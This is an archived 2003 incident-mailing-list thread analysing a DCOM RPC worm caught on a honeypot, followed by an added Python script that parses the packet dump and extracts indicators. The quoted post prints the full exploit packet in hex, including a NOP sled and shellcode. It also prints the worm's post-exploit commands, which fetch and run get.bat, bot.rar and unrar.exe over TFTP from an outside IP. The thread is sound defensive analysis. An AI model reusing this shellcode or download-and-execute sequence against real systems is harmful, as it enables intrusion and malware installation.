RE: DCOM worm with get.bat bot.rar

From: Peter Ellison (p.pe_at_btopenworld.com)
Date: 08/20/03

    To: <incidents@securityfocus.com>
    Date: Wed, 20 Aug 2003 13:55:27 +0100
    
    

    This IP range is dynamically applied at login time; why the perp hardwired
    his/her "project", your guess is as good as mine. From personal dealings with
    this ISP, allocation of IPs is not as dynamic as it's supposed to be. The
    record for me so far is 6 weeks without a change!

    -----Original Message-----
    From: Jeremiah Cornelius [mailto:jeremiah@nur.net]
    Sent: 19 August 2003 18:35
    To: incidents@securityfocus.com
    Subject: Re: DCOM worm with get.bat bot.rar

    The address is an NTL IP in North UK. Likely a DSL there. Looks like it's
    been unplugged, or DoSed by tftp!

    ----- Original Message -----
    From: "Andrej" <laj@swordlord.com>
    To: <incidents@securityfocus.com>
    Sent: Tuesday, August 19, 2003 2:05 AM
    Subject: DCOM worm with get.bat bot.rar

    > I just got a new DCOM worm on our honeypot. After the exploit on port 135
    > (dump below) a connection was built on port 4444:
    > TFTP -i 81.103.7.66 GET get.bat
    > get.bat
    > exit
    > I was able to get the get.bat; it's:
    > mkdir C:\RECYCLER\S-1-5-21-57989841-1715567821-725345543-1004\
    > cd C:\RECYCLER\S-1-5-21-57989841-1715567821-725345543-1004\
    > TFTP -i 81.103.7.66 GET bot.rar
    > TFTP -i 81.103.7.66 GET unrar.bat
    > TFTP -i 81.103.7.66 GET unrar.exe
    > start unrar.bat
    > exit
    > unfortunately I was not able to download the bot.rar for inspection because
    > the connection timed out. Maybe somebody else is more successful.
    >
    > cheers
    > andrej
    >
    >
    >
    > [2003-08-19 10:37:34]
    > IPv4: 81.103.7.66 -> *
    > hlen=5 TOS=0 dlen=1500 ID=48197 flags=0 offset=0 TTL=114
    > chksum=43601
    > TCP: port=1176 -> dport: 135 flags=***A**** seq=2683878707
    > ack=1434085177 off=5 res=0 win=64240 urp=0 chksum=61593
    > Payload: length = 1460
    >
    > 000 : 05 00 00 03 10 00 00 00 A8 06 00 00 E5 00 00 00 ................
    > 010 : 90 06 00 00 01 00 04 00 05 00 06 00 01 00 00 00 ................
    > 020 : 00 00 00 00 32 24 58 FD CC 45 64 49 B0 70 DD AE ....2$X..EdI.p..
    > 030 : 74 2C 96 D2 60 5E 0D 00 01 00 00 00 00 00 00 00 t,..`^..........
    > 040 : 70 5E 0D 00 02 00 00 00 7C 5E 0D 00 00 00 00 00 p^......|^......
    > 050 : 10 00 00 00 80 96 F1 F1 2A 4D CE 11 A6 6A 00 20 ........*M...j.
    > 060 : AF 6E 72 F4 0C 00 00 00 4D 41 52 42 01 00 00 00 .nr.....MARB....
    > 070 : 00 00 00 00 0D F0 AD BA 00 00 00 00 A8 F4 0B 00 ................
    > 080 : 20 06 00 00 20 06 00 00 4D 45 4F 57 04 00 00 00 ... ...MEOW....
    > 090 : A2 01 00 00 00 00 00 00 C0 00 00 00 00 00 00 46 ...............F
    > 0a0 : 38 03 00 00 00 00 00 00 C0 00 00 00 00 00 00 46 8..............F
    > 0b0 : 00 00 00 00 F0 05 00 00 E8 05 00 00 00 00 00 00 ................
    > 0c0 : 01 10 08 00 CC CC CC CC C8 00 00 00 4D 45 4F 57 ............MEOW
    > 0d0 : E8 05 00 00 D8 00 00 00 00 00 00 00 02 00 00 00 ................
    > 0e0 : 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
    > 0f0 : 00 00 00 00 C4 28 CD 00 64 29 CD 00 00 00 00 00 .....(..d)......
    > 100 : 07 00 00 00 B9 01 00 00 00 00 00 00 C0 00 00 00 ................
    > 110 : 00 00 00 46 AB 01 00 00 00 00 00 00 C0 00 00 00 ...F............
    > 120 : 00 00 00 46 A5 01 00 00 00 00 00 00 C0 00 00 00 ...F............
    > 130 : 00 00 00 46 A6 01 00 00 00 00 00 00 C0 00 00 00 ...F............
    > 140 : 00 00 00 46 A4 01 00 00 00 00 00 00 C0 00 00 00 ...F............
    > 150 : 00 00 00 46 AD 01 00 00 00 00 00 00 C0 00 00 00 ...F............
    > 160 : 00 00 00 46 AA 01 00 00 00 00 00 00 C0 00 00 00 ...F............
    > 170 : 00 00 00 46 07 00 00 00 60 00 00 00 58 00 00 00 ...F....`...X...
    > 180 : 90 00 00 00 40 00 00 00 20 00 00 00 38 03 00 00 ....@... ...8...
    > 190 : 30 00 00 00 01 00 00 00 01 10 08 00 CC CC CC CC 0...............
    > 1a0 : 50 00 00 00 4F B6 88 20 FF FF FF FF 00 00 00 00 P...O.. ........
    > 1b0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
    > 1c0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
    > 1d0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
    > 1e0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
    > 1f0 : 00 00 00 00 00 00 00 00 01 10 08 00 CC CC CC CC ................
    > 200 : 48 00 00 00 07 00 66 00 06 09 02 00 00 00 00 00 H.....f.........
    > 210 : C0 00 00 00 00 00 00 46 10 00 00 00 00 00 00 00 .......F........
    > 220 : 00 00 00 00 01 00 00 00 00 00 00 00 78 19 0C 00 ............x...
    > 230 : 58 00 00 00 05 00 06 00 01 00 00 00 70 D8 98 93 X...........p...
    > 240 : 98 4F D2 11 A9 3D BE 57 B2 00 00 00 32 00 31 00 .O...=.W....2.1.
    > 250 : 01 10 08 00 CC CC CC CC 80 00 00 00 0D F0 AD BA ................
    > 260 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
    > 270 : 18 43 14 00 00 00 00 00 60 00 00 00 60 00 00 00 .C......`...`...
    > 280 : 4D 45 4F 57 04 00 00 00 C0 01 00 00 00 00 00 00 MEOW............
    > 290 : C0 00 00 00 00 00 00 46 3B 03 00 00 00 00 00 00 .......F;.......
    > 2a0 : C0 00 00 00 00 00 00 46 00 00 00 00 30 00 00 00 .......F....0...
    > 2b0 : 01 00 01 00 81 C5 17 03 80 0E E9 4A 99 99 F1 8A ...........J....
    > 2c0 : 50 6F 7A 85 02 00 00 00 00 00 00 00 00 00 00 00 Poz.............
    > 2d0 : 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 ................
    > 2e0 : 01 10 08 00 CC CC CC CC 30 00 00 00 78 00 6E 00 ........0...x.n.
    > 2f0 : 00 00 00 00 D8 DA 0D 00 00 00 00 00 00 00 00 00 ................
    > 300 : 20 2F 0C 00 00 00 00 00 00 00 00 00 03 00 00 00 /..............
    > 310 : 00 00 00 00 03 00 00 00 46 00 58 00 00 00 00 00 ........F.X.....
    > 320 : 01 10 08 00 CC CC CC CC 10 00 00 00 30 00 2E 00 ............0...
    > 330 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
    > 340 : 01 10 08 00 CC CC CC CC 68 00 00 00 0E 00 FF FF ........h.......
    > 350 : 68 8B 0B 00 02 00 00 00 00 00 00 00 00 00 00 00 h...............
    > 360 : 86 01 00 00 00 00 00 00 86 01 00 00 5C 00 5C 00 ............\.\.
    > 370 : 46 00 58 00 4E 00 42 00 46 00 58 00 46 00 58 00 F.X.N.B.F.X.F.X.
    > 380 : 4E 00 42 00 46 00 58 00 46 00 58 00 46 00 58 00 N.B.F.X.F.X.F.X.
    > 390 : 46 00 58 00 9D 13 00 01 CC E0 FD 7F CC E0 FD 7F F.X...........
    > 3a0 : 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
    > 3b0 : 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
    > 3c0 : 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
    > 3d0 : 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
    > 3e0 : 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
    > 3f0 : 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
    > 400 : 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
    > 410 : 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
    > 420 : 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
    > 430 : 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
    > 440 : 90 90 90 90 90 90 90 EB 19 5E 31 C9 81 E9 89 FF .........^1.....
    > 450 : FF FF 81 36 80 BF 32 94 81 EE FC FF FF FF E2 F2 ...6..2.........
    > 460 : EB 05 E8 E2 FF FF FF 03 53 06 1F 74 57 75 95 80 ........S..tWu..
    > 470 : BF BB 92 7F 89 5A 1A CE B1 DE 7C E1 BE 32 94 09 ....Z....|..2..
    > 480 : F9 3A 6B B6 D7 9F 4D 85 71 DA C6 81 BF 32 1D C6 .:k...M.q....2..
    > 490 : B3 5A F8 EC BF 32 FC B3 8D 1C F0 E8 C8 41 A6 DF .Z...2.......A..
    > 4a0 : EB CD C2 88 36 74 90 7F 89 5A E6 7E 0C 24 7C AD ....6t..Z.~.$|.
    > 4b0 : BE 32 94 09 F9 22 6B B6 D7 4C 4C 62 CC DA 8A 81 .2..."k..LLb....
    > 4c0 : BF 32 1D C6 AB CD E2 84 D7 F9 79 7C 84 DA 9A 81 .2........y|....
    > 4d0 : BF 32 1D C6 A7 CD E2 84 D7 EB 9D 75 12 DA 6A 80 .2.........u..j.
    > 4e0 : BF 32 1D C6 A3 CD E2 84 D7 96 8E F0 78 DA 7A 80 .2..........x.z.
    > 4f0 : BF 32 1D C6 9F CD E2 84 D7 96 39 AE 56 DA 4A 80 .2........9.V.J.
    > 500 : BF 32 1D C6 9B CD E2 84 D7 D7 DD 06 F6 DA 5A 80 .2............Z.
    > 510 : BF 32 1D C6 97 CD E2 84 D7 D5 ED 46 C6 DA 2A 80 .2.........F..*.
    > 520 : BF 32 1D C6 93 01 6B 01 53 A2 95 80 BF 66 FC 81 .2....k.S....f..
    > 530 : BE 32 94 7F E9 2A C4 D0 EF 62 D4 D0 FF 62 6B D6 .2..*...b...bk.
    > 540 : A3 B9 4C D7 E8 5A 96 80 AE 6E 1F 4C D5 24 C5 D3 ..L..Z...n.L.$..
    > 550 : 40 64 B4 D7 EC CD C2 A4 E8 63 C7 7F E9 1A 1F 50 @d.......c....P
    > 560 : D7 57 EC E5 BF 5A F7 ED DB 1C 1D E6 8F B1 78 D4 .W...Z........x.
    > 570 : 32 0E B0 B3 7F 01 5D 03 7E 27 3F 62 42 F4 D0 A4 2....].~'?bB...
    > 580 : AF 76 6A C4 9B 0F 1D D4 9B 7A 1D D4 9B 7E 1D D4 .vj......z...~..
    > 590 : 9B 62 19 C4 9B 22 C0 D0 EE 63 C5 EA BE 63 C5 7F .b..."...c...c.
    > 5a0 : C9 02 C5 7F E9 22 1F 4C D5 CD 6B B1 40 64 98 0B ....".L..k.@d..
    > 5b0 : 77 65 6B D6 wek.
    >
    >
    > [2003-08-19 10:37:34]
    > IPv4: 81.103.7.66 -> *
    > hlen=5 TOS=0 dlen=284 ID=48198 flags=0 offset=0 TTL=114
    > chksum=44816
    > TCP: port=1176 -> dport: 135 flags=***AP*** seq=2683880167
    > ack=1434085177 off=5 res=0 win=64240 urp=0 chksum=21751
    > Payload: length = 244
    >
    > 000 : 93 CD C2 94 EA 64 F0 21 8F 32 94 80 3A F2 EC 8C .....d.!.2..:...
    > 010 : 34 72 98 0B CF 2E 39 0B D7 3A 7F 89 34 72 A0 0B 4r....9..:.4r..
    > 020 : 17 8A 94 80 BF B9 51 DE E2 F0 90 80 EC 67 C2 D7 ......Q......g..
    > 030 : 34 5E B0 98 34 77 A8 0B EB 37 EC 83 6A B9 DE 98 4^..4w...7..j...
    > 040 : 34 68 B4 83 62 D1 A6 C9 34 06 1F 83 4A 01 6B 7C 4h..b...4...J.k|
    > 050 : 8C F2 38 BA 7B 46 93 41 70 3F 97 78 54 C0 AF FC ..8.{F.Ap?.xT...
    > 060 : 9B 26 E1 61 34 68 B0 83 62 54 1F 8C F4 B9 CE 9C .&.a4h..bT......
    > 070 : BC EF 1F 84 34 31 51 6B BD 01 54 0B 6A 6D CA DD ....41Qk..T.jm..
    > 080 : E4 F0 90 80 2F A2 04 00 5C 00 43 00 24 00 5C 00 ..../...\.C.$.\.
    > 090 : 31 00 32 00 33 00 34 00 35 00 36 00 31 00 31 00 1.2.3.4.5.6.1.1.
    > 0a0 : 31 00 31 00 31 00 31 00 31 00 31 00 31 00 31 00 1.1.1.1.1.1.1.1.
    > 0b0 : 31 00 31 00 31 00 31 00 31 00 2E 00 64 00 6F 00 1.1.1.1.1...d.o.
    > 0c0 : 63 00 00 00 01 10 08 00 CC CC CC CC 20 00 00 00 c........... ...
    > 0d0 : 30 00 2D 00 00 00 00 00 88 2A 0C 00 02 00 00 00 0.-......*......
    > 0e0 : 01 00 00 00 28 8C 0C 00 01 00 00 00 07 00 00 00 ....(...........
    > 0f0 : 00 00 00 00 ....
    >
    > ---------------------------------------------------------------------------
    > Captus Networks - Integrated Intrusion Prevention and Traffic Shaping
    > - Instantly Stop DoS/DDoS Attacks, Worms & Port Scans
    > - Automatically Control P2P, IM and Spam Traffic
    > - Ensure Reliable Performance of Mission Critical Applications
    > - Precisely Define and Implement Network Security and Performance Policies
    > **FREE Vulnerability Assessment Toolkit - WhitePapers - Live Demo
    > Visit us at:
    > http://www.securityfocus.com/sponsor/CaptusNetworks_incidents_030814
    > ---------------------------------------------------------------------------

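
    Below is an added triage script for the capture Andrej posted; it is not part
    of the original thread and was not written by any of the posters. It
    re-assembles the two TCP segments from the `OFF : HEX ASCII` dump lines (a
    verbatim excerpt of the dump is embedded; the 1460 and 244 byte lengths come
    from the two `Payload: length` headers), decodes the DCERPC request header at
    the top of the dump, locates the byte patterns that mark the payload as the
    public DCOM RPC exploit (the "MEOW" OBJREF signature, the UTF-16 UNC string
    \\FXNBFXFXNBFXFXFXFX at 0x36c, the pointer 0x7ffde0cc that follows it, the
    0x90 sled, and the \C$\ ...doc path in the second segment), and pulls the
    TFTP server, fetched file names and the RECYCLER staging directory out of
    the port-4444 session and get.bat. Reading those patterns as the DCOM exploit
    is my interpretation; the thread itself only says "DCOM worm". All function
    and constant names are mine. One thing worth noticing that the post does not
    spell out: frag_length in the header is 0x06a8 = 1704 = 1460 + 244, so the
    two segments Andrej captured are exactly one complete DCERPC fragment.

```python
"""Triage of the port-135 dump and post-exploit commands quoted above (added
example, not from the original post): rebuild the payload from the dump lines,
decode the DCERPC header, flag the DCOM exploit's byte patterns, pull IOCs."""
import re
import struct

# Excerpt of the first TCP segment (1460 payload bytes) as posted; most lines
# are omitted, so the parser must place bytes by offset, not in order.
DUMP_PKT1 = r"""
> 000 : 05 00 00 03 10 00 00 00 A8 06 00 00 E5 00 00 00 ................
> 010 : 90 06 00 00 01 00 04 00 05 00 06 00 01 00 00 00 ................
> 080 : 20 06 00 00 20 06 00 00 4D 45 4F 57 04 00 00 00 ... ...MEOW....
> 360 : 86 01 00 00 00 00 00 00 86 01 00 00 5C 00 5C 00 ............\.\.
> 370 : 46 00 58 00 4E 00 42 00 46 00 58 00 46 00 58 00 F.X.N.B.F.X.F.X.
> 380 : 4E 00 42 00 46 00 58 00 46 00 58 00 46 00 58 00 N.B.F.X.F.X.F.X.
> 390 : 46 00 58 00 9D 13 00 01 CC E0 FD 7F CC E0 FD 7F F.X...........
> 3a0 : 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
> 3b0 : 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
"""
# One line of the second segment (244 payload bytes), same source.
DUMP_PKT2 = r"""
> 080 : E4 F0 90 80 2F A2 04 00 5C 00 43 00 24 00 5C 00 ..../...\.C.$.\.
"""
# Port-4444 session and get.bat exactly as quoted in the post.
SESSION_4444 = "TFTP -i 81.103.7.66 GET get.bat\nget.bat\nexit\n"
GET_BAT = r"""mkdir C:\RECYCLER\S-1-5-21-57989841-1715567821-725345543-1004\
cd C:\RECYCLER\S-1-5-21-57989841-1715567821-725345543-1004\
TFTP -i 81.103.7.66 GET bot.rar
TFTP -i 81.103.7.66 GET unrar.bat
TFTP -i 81.103.7.66 GET unrar.exe
start unrar.bat
exit
"""

DUMP_LINE = re.compile(r"^\s*>?\s*([0-9A-Fa-f]{3,8})\s*:\s*(.*)$")
HEX_BYTE = re.compile(r"^[0-9A-Fa-f]{2}$")

def parse_dump(text: str) -> bytearray:
    """Place each line's bytes at its offset (gaps stay zero). At most 16 hex
    tokens are read per line; the first token that is not one starts the gutter."""
    buf = bytearray()
    for line in text.splitlines():
        m = DUMP_LINE.match(line)
        if not m:
            continue
        offset, data = int(m.group(1), 16), bytearray()
        for tok in m.group(2).split():
            if len(data) == 16 or not HEX_BYTE.match(tok):
                break
            data.append(int(tok, 16))
        buf.extend(b"\x00" * max(0, offset + len(data) - len(buf)))
        buf[offset:offset + len(data)] = data
    return buf

def parse_dcerpc_header(buf: bytes) -> dict:
    """16-byte DCERPC common header plus, for a request (ptype 0), alloc_hint,
    context_id and opnum."""
    vers, minor, ptype, flags = struct.unpack_from("<BBBB", buf, 0)
    end = "<" if (buf[4] & 0xF0) == 0x10 else ">"  # drep byte: 0x10 = little-endian
    frag_len, auth_len, call_id = struct.unpack_from(end + "HHI", buf, 8)
    hdr = {"version": vers, "minor": minor, "ptype": ptype, "flags": flags,
           "frag_length": frag_len, "auth_length": auth_len, "call_id": call_id}
    if ptype == 0:
        hdr["alloc_hint"], hdr["context_id"], hdr["opnum"] = struct.unpack_from(end + "IHH", buf, 16)
    return hdr

UNC_MARKER = "\\\\FXNBFXFXNBFXFXFXFX".encode("utf-16-le")  # UTF-16 UNC string at 0x36c
SHARE_PATH = "\\C$\\".encode("utf-16-le")                   # start of the \C$\...doc path

def dcom_indicators(buf: bytes) -> dict:
    """Offsets (-1 = absent) of the marker strings, the longest 0x90 NOP run and
    the pointer that follows the UNC marker."""
    ind = {"objref_meow": buf.find(b"MEOW"), "unc_marker": buf.find(UNC_MARKER),
           "share_path": buf.find(SHARE_PATH), "return_address": None,
           "nop_sled": max((len(m.group()) for m in re.finditer(rb"\x90+", buf)), default=0)}
    if ind["unc_marker"] >= 0:
        at = ind["unc_marker"] + len(UNC_MARKER) + 4  # marker, 4 bytes, then the pointer twice
        ind["return_address"] = struct.unpack_from("<I", buf, at)[0]
    return ind

TFTP_GET = re.compile(r"\bTFTP\s+-i\s+(\d{1,3}(?:\.\d{1,3}){3})\s+GET\s+(\S+)", re.I)
DROP_DIR = re.compile(r"^(?:mkdir|cd)\s+(\S+)", re.I | re.M)

def extract_iocs(*texts: str) -> dict:
    """TFTP servers, fetched files (fetch order, deduplicated) and staging dirs."""
    gets = [g for t in texts for g in TFTP_GET.findall(t)]
    return {"tftp_servers": sorted({ip for ip, _ in gets}),
            "files": list(dict.fromkeys(name for _, name in gets)),
            "drop_dirs": sorted({d for t in texts for d in DROP_DIR.findall(t)})}

def triage() -> dict:
    # Pad each segment to the `Payload: length` its capture header reports so the
    # second segment's offsets line up, then check that both segments together are
    # exactly one DCERPC fragment (1460 + 244 == 0x6a8, the frag_length).
    stream = b"".join(bytes(parse_dump(t)).ljust(n, b"\x00")
                      for t, n in ((DUMP_PKT1, 1460), (DUMP_PKT2, 244)))
    hdr = parse_dcerpc_header(stream)
    return {"header": hdr, "fragment_complete": hdr["frag_length"] == len(stream),
            "indicators": dcom_indicators(stream),
            "iocs": extract_iocs(SESSION_4444, GET_BAT)}
```

    triage() returns one dict with the decoded header (version 5, request,
    frag_length 1704, call_id 229, opnum 4), the indicator offsets, and the IOC
    lists; on the excerpt the NOP run is 32 bytes, while the full dump from the
    post would report the whole sled. parse_dump() only trusts the hex column, so
    the stripped non-printables in the ASCII gutter do not matter, and short lines
    such as the final `5b0 : 77 65 6B D6 wek.` are handled.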
    
